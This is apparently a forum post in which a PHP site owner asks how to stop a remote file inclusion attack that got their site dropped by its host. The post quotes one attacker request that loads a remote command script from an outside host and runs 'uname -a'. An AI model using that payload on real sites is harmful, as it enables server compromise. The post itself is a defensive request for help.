I have been told by my host that they will no longer host a site for me due to the 2nd attempt of someone used it as a launchpad for an attack.
I am pretty familiar with PHP and have built many sites, however this recent incident has caused me to be concerned about the potential risks to other sites.
My host says that the hacker/attacker used something like:
"/index_dot_php?file=http://cmd_dot_intersul_dot_org/cmd_dot_txt?&cmd=uname%20-a"
(the periods have been replaced with 'dot' incase this gets posted as a link)
Basically the hacker was able to piggy back on a "GET" request.
So, with that said, my question is to all you knowledgeable people in cyberland...
What can be done to NOT allow someone to do this?
Your help is GREATLY appreciated.